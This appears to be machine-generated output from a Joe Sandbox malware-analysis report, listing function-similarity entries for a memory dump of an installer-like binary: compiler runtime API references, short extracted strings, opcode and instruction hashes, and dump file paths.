                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: b29a5a1690c2dc2582c9ebe9cfba4c71434be462e9545c8dbcc438acb268170e
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: E2218C30901219BFDF208FA5CD40DDFBE79FF817A9F208326B625616E0E2718D55C6A1
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CC9A6F1
                                • Part of subcall function 6CCA9173: __EH_prolog.LIBCMT ref: 6CCA9178
                              • __EH_prolog.LIBCMT ref: 6CC9A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: d9f640b483fe19e2f7fbc7cdb3d2bbf284b5bc9c61a0348778a30282e516bb33
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: CF71B130D01255DFDB14CFA4C484BEEBBF0BF54308F1080A9D959ABB91EB74AA09CB95
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCAE41D
                                • Part of subcall function 6CCAEE40: __EH_prolog.LIBCMT ref: 6CCAEE45
                                • Part of subcall function 6CCAE8EB: __EH_prolog.LIBCMT ref: 6CCAE8F0
                                • Part of subcall function 6CCAE593: __EH_prolog.LIBCMT ref: 6CCAE598
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: 464bcd55354c925141d70715fa0e32be0343b187fedf69dcf7fa4ce892406833
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: 2B217C71D01258AACB08DBE4D9949DEBFB4AF55318F10406DD41677780EB785A0CCB51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J$DJ$`J
                              • API String ID: 3519838083-2453737217
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: $CK$CK
                              • API String ID: 3519838083-2957773085
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCB4ECC
                                • Part of subcall function 6CC9F58A: __EH_prolog.LIBCMT ref: 6CC9F58F
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              Strings
                              Similarity
                              • API ID:
                              • String ID: <J$DJ$HJ$TJ$]
                              • API String ID: 0-686860805
                              APIs
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CC8E077
                                • Part of subcall function 6CC8DFF5: __EH_prolog.LIBCMT ref: 6CC8DFFA
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: :$\
                              • API String ID: 3519838083-1166558509
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$hfJ
                              • API String ID: 3519838083-1391159562
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCA8C5D
                                • Part of subcall function 6CCA761A: __EH_prolog.LIBCMT ref: 6CCA761F
                                • Part of subcall function 6CCA7A2E: __EH_prolog.LIBCMT ref: 6CCA7A33
                                • Part of subcall function 6CCA8EA5: __EH_prolog.LIBCMT ref: 6CCA8EAA
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog__aullrem
                              • String ID: d%K
                              • API String ID: 3415659256-3110269457
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: <dJ$Q
                              • API String ID: 3519838083-2252229148
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: PdJ$Q
                              • API String ID: 3519838083-3674001488
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              APIs
                              Strings
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCCAFCC
                                • Part of subcall function 6CCCA4D1: __EH_prolog.LIBCMT ref: 6CCCA4D6
                                • Part of subcall function 6CCC914B: __EH_prolog.LIBCMT ref: 6CCC9150
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCC43F9
                                • Part of subcall function 6CCC4320: __EH_prolog.LIBCMT ref: 6CCC4325
                              Strings
                              Similarity
                              • API ID: H_prolog
                              • String ID: `)L$|{J
                              • API String ID: 3519838083-2198066115
                              APIs
                              Strings
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              Strings
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 495c65ae17fc31ff2f5c06e9509f1dd22e718ab3de5301895c4bdea5c6591a3b
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: 7B51A1719052099FCF01CF95D840BDFBBB1BF1A32CF10442AE81667A90FB75A949CB51
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: acb7d17cc4bb1bfbc4c9484ee25437ae1d071cd7f64cc98271883d5199a39e9e
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: 37F017B06017009EC3608F06D54869BBBF4EB4270AF50C91EE19A9BA40D3B8A5088FB8
